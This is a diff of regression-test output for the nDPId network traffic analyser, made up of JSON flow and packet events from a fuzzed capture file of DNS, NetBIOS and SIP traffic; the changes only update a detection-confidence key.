00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":1120470431656,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470431656,"pkt":"ADBUADRWAODtAW69CABFAABEa08AAIARTAbAqAECwKgBAQrgADUAMIb5neUAAAABAAAAAAAAATEBMAEwJXMANwdpbi1hZGRyqqqqqqqqqqqqqg=="} -00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":408,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470431656,"flow_last_seen":1120470431656,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470431656,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2784,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":14087,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":408,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470431656,"flow_last_seen":1120470431656,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470431656,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2784,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":14087,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":409,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470431657,"flow_last_seen":1120470431657,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470431657,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.5.2","src_port":53,"dst_port":2784,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1120470431657,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470431657,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgFAgA1CuAAR2l1neWAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFzcGEAAAwAAcAMAAwAAQAAJyVzAAlsb2NhbGhvc3QA"} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470431657,"flow_last_seen":1120470431657,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470431657,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.5.2","src_port":53,"dst_port":2784,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.aspa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470431657,"flow_last_seen":1120470431657,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470431657,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.5.2","src_port":53,"dst_port":2784,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.aspa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":411,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":18688,"global_ts_msec":1120470439142} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":411,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":18688,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470431658,"pkt":"ADBUADRWAODtAW69SQBFAIBIa1EAAIARTADAqAECwKgBAQrhADUANAD+KOYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":412,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":2,"flow_last_seen":1120470440137,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470440137,"pkt":"ADBUADRWAODtAW69CABFAABIa1LfAEwlcwDAqAECwKgBAQrhADUANAD+KOYBAAABAAAAQAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":413,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470259918,"flow_last_seen":1120470259918,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470440137,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":14798,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":413,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470250807,"flow_last_seen":1120470250807,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470440137,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2765,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":413,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470250807,"flow_last_seen":1120470250807,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470440137,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2765,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":413,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250805,"flow_last_seen":1120470250805,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470440137,"l3_proto":"ip4","src_ip":"192.168.1.110","dst_ip":"192.168.1.1","src_port":2765,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":413,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470251907,"flow_last_seen":1120470253909,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470440137,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":413,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250906,"flow_last_seen":1120470250906,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470440137,"l3_proto":"ip4","src_ip":"192.168.1.172","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -765,33 +765,33 @@ 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":413,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1120470442140,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":28,"thread_ts_msec":1120470442140,"pkt":"ADBUADRWAODtAW69CABFAAAwa1MAAIATS\/7AqAECwKgBAQrhADUANAD+KOYBAAABAAAAAEsABF9zaXAEX3VkcANzaXB3Y3liZXJjaXR5AmRrAAAhAAE="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":414,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470444143,"flow_last_seen":1120470444143,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470444143,"l3_proto":"ip4","src_ip":"200.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":414,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":1120470444143,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470444143,"pkt":"ADBUADRWAODtAW69CABFAABIa1QAAIARS\/3IqAECwKgBAQrhADUANAD+KOYBIAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAEk="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":414,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470444143,"flow_last_seen":1120470444143,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470444143,"l3_proto":"ip4","src_ip":"200.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":414,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470444143,"flow_last_seen":1120470444143,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470444143,"l3_proto":"ip4","src_ip":"200.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":416,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470447197,"flow_last_seen":1120470447197,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470447197,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":35721,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":416,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1120470447197,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470447197,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOa1YAAIARSvfAqAECwKgB\/wCJi4kAOltphTIBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ3hDQSlNAAAgAAE="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":418,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470448149,"flow_last_seen":1120470448149,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470448149,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":418,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1120470448149,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470448149,"pkt":"ADBUADRWAODtAW69CABFAABIa1gAAIARS\/nAqAECwKgBAQrhADUANAD+KOYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXZjaXR5AmRrAAAhlAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":418,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470448149,"flow_last_seen":1120470448149,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470448149,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybevcity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":418,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470448149,"flow_last_seen":1120470448149,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470448149,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybevcity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":419,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847669,"flow_last_seen":1120469847669,"flow_idle_time":620000,"flow_min_l4_payload_len":475,"flow_max_l4_payload_len":475,"flow_tot_l4_payload_len":475,"flow_avg_l4_payload_len":475,"midstream":0,"thread_ts_msec":1120470448149,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","l4_proto":120,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":419,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847669,"flow_last_seen":1120469847669,"flow_idle_time":620000,"flow_min_l4_payload_len":475,"flow_max_l4_payload_len":475,"flow_tot_l4_payload_len":475,"flow_avg_l4_payload_len":475,"midstream":0,"thread_ts_msec":1120470448149,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","l4_proto":120,"flow_datalink":1,"flow_max_packets":3} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":419,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470267920,"flow_last_seen":1120470267922,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470448149,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2767,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":419,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470267920,"flow_last_seen":1120470267922,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470448149,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2767,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00593{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":419,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470267925,"flow_last_seen":1120470276933,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470448149,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2768,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456151,"flow_last_seen":1120470456151,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470456151,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.3","src_port":2786,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1120470456151,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470456151,"pkt":"ADBUADRWAODtAW69CABFAABEa1kAAIARS\/zAqAECwKgBAwriADUAMED14+cAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZKxyBGFycGEAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456151,"flow_last_seen":1120470456151,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470456151,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.3","src_port":2786,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-ad?r.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456151,"flow_last_seen":1120470456151,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470456151,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.3","src_port":2786,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-ad?r.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":420,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":71,"global_ts_msec":1120470456152} 00425{"packet_event_id":1,"packet_event_name":"packet","packet_id":420,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":105,"pkt_l4_len":0,"thread_ts_msec":1120470456151,"pkt":"AODtAW69ADBUADRWCABFAABbAABACEARtz7AqAEBwKgBAgA1CuIARyNx4+eAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":422,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456286,"flow_last_seen":1120470456286,"flow_idle_time":200000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1120470456286,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":9587,"dst_port":196,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01099{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":1,"flow_last_seen":1120470456286,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":527,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":527,"pkt_l4_len":493,"thread_ts_msec":1120470456286,"pkt":"AODtAW69ADBUADRWCABFAAIBAABAADcRiizU8iEjwKgBAiVzAMQB7c3hU0lQJXMAMCA0MDEgVW5hdXRob3JpemVkDQpDYWxsLUlEOiA1NzgyMjI3MjktNDY2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDU2VxOiA3NiBSRUdJU1RFUg0KRnJvbTogPHNpcDp2b2kxODA2MkBzaXAuY3liZXJjaXR5LmRrPjN0YWc9M2JmZmNjYw0KVG86IDxzaXA6dm9pMTgwNjJAc2lwLmN5+GVyY2l0cS5kaz47dGFnPTAwLTA0MDkwLTE3MDFiNjUxLTE1YzIzOGNlNg0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjtyZUNlaXNlZD04MC4yMzAuMjE5LjcwO3Jwb3J0PTUwNjA7YnJhbmNoPXo5aEc0YktucDYyOTEzNjY1LTQzMGFhMmRhMTkyLjE2OC4xLjINCldXVy0lcwBoZW50aWNhtWU6IERpZ2VzdFNyZWFsbT0ic2lwLmN5YmVyYyVzAEFkayIsbm9uY2VUIjE3MDFiNjM5MTQ4MDVjZDIxMzk1MzZjMDAzMjNkNTgiLG9wYXF1ZT0iMTcwMWExMzUxYjcwNzk1IixzdGFsZT1mYWxzZSxhbGdvcml0aCVzAEQ1DQpDb250ZW50LUxlbmd0aDogMA0KDQo="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":423,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456513,"flow_last_seen":1120470456513,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470456513,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.3.1","src_port":2787,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 